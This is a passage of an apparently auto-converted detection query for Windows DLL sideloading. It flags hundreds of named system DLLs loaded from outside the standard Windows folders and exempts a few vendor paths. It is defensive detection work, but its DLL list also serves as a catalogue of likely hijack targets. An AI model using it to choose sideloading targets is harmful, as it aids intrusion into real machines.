'%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 